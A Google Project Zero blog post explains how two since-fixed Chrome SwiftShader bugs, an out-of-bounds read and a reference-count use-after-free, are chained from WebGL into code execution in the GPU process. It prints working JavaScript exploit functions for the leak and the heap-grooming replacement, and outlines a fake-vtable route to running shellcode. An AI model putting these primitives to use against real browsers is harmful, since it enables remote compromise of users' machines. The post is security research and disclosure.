Posted by Mark Brand, Google Project Zero
On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.
SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.
It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fallback to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.
Previous precision problems
So; we previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read()is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation will happen at the first line marked in bold, and the out-of-bounds access happens at the second).
function issue_1584(gl) {
const src_width = 0x2000;
const src_height = 0x16c4;
// we use a texture for the source, since this will be allocated directly
// when we call glTexImage2D.
this.src_fb = gl.createFramebuffer();
gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);
let src_data = new Uint8Array(src_width * src_height * 4);
for (var i = 0; i < src_data.length; ++i) {
src_data[i] = 0x41;
}
let src_tex = gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D, src_tex);
gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);
this.read = function() {
gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);
const dst_width = 0x2000;
const dst_height = 0x1fc4;
dst_fb = gl.createFramebuffer();
gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);
let dst_rb = gl.createRenderbuffer();
gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);
gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);
// trigger
gl.blitFramebuffer(0, 0, src_width, src_height,
0, 0, dst_width, dst_height,
gl.COLOR_BUFFER_BIT, gl.NEAREST);
// copy the out of bounds data back to javascript
var leak_data = new Uint8Array(dst_width * 8);
gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
return leak_data.buffer;
}
return this;
}
This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.
And a second bug
Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write from the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a c++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.
So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!
This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.
However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.
The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The shader source code (the first bold section) will cause 4 allocations of size 0xf0 when the program object is linked, and the second bold section is where the original object will be free’d and replaced by a shader uniform object.
function issue_1585(gl, fake) {
let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
gl.shaderSource(vertex_shader, `
attribute vec4 position;
uniform int block0[60];
uniform int block1[60];
uniform int block2[60];
uniform int block3[60];
void main() {
gl_Position = position;
gl_Position.x += float(block0[0]);
gl_Position.x += float(block1[0]);
gl_Position.x += float(block2[0]);
gl_Position.x += float(block3[0]);
}`);
gl.compileShader(vertex_shader);
let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
gl.shaderSource(fragment_shader, `
void main() {
gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
}`);
gl.compileShader(fragment_shader);
this.program = gl.createProgram();
gl.attachShader(this.program, vertex_shader);
gl.attachShader(this.program, fragment_shader);
const uaf_width = 8190;
const uaf_height = 8190;
this.fb = gl.createFramebuffer();
uaf_rb = gl.createRenderbuffer();
gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);
let tex = gl.createTexture();
gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);
// trigger
for (i = 2; i < 0x10; ++i) {
gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
}
function unroll(gl) {
gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
// snip ...
gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
}
for (i = 0x10; i < 0x100000000; i += 0x10) {
unroll(gl);
}
// the egl::ImageImplementation for the rendertarget of uaf_rb is now 0, so
// this call will free it, leaving a dangling reference
gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);
// replace the allocation with our shader uniform.
gl.linkProgram(this.program);
gl.useProgram(this.program);
function wait(ms) {
var start = Date.now(),
now = start;
while (now - start < ms) {
now = Date.now();
}
}
function read(uaf, index) {
wait(200);
var read_data = new Int32Array(60);
for (var i = 0; i < 60; ++i) {
read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));
}
return read_data.buffer;
}
function write(uaf, index, buffer) {
gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));
wait(200);
}
this.read = function() {
return read(this, this.index);
}
this.write = function(buffer) {
return write(this, this.index, buffer);
}
for (var i = 0; i < 4; ++i) {
write(this, i, fake.buffer);
}
gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));
for (var i = 0; i < 4; ++i) {
data = new DataView(read(this, i));
for (var j = 0; j < 0xf0; ++j) {
if (fake.getUint8(j) != data.getUint8(j)) {
log('uaf block index is ' + i.toString());
this.index = i;
return this;
}
}
}
}
At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.
Now, it should be fairly trivial to get arbitrary code execution from this point, although it’s often a pain to get your ROP chain to line up nicely when you have to replace a c++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.
SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another c++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that uses our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?
We can - so by creating a fake vtable such that:
egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternal
egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
egl::ImageImplementation::release -> shellcode
When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.
Conclusions
It’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.
In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.
Posting Komentar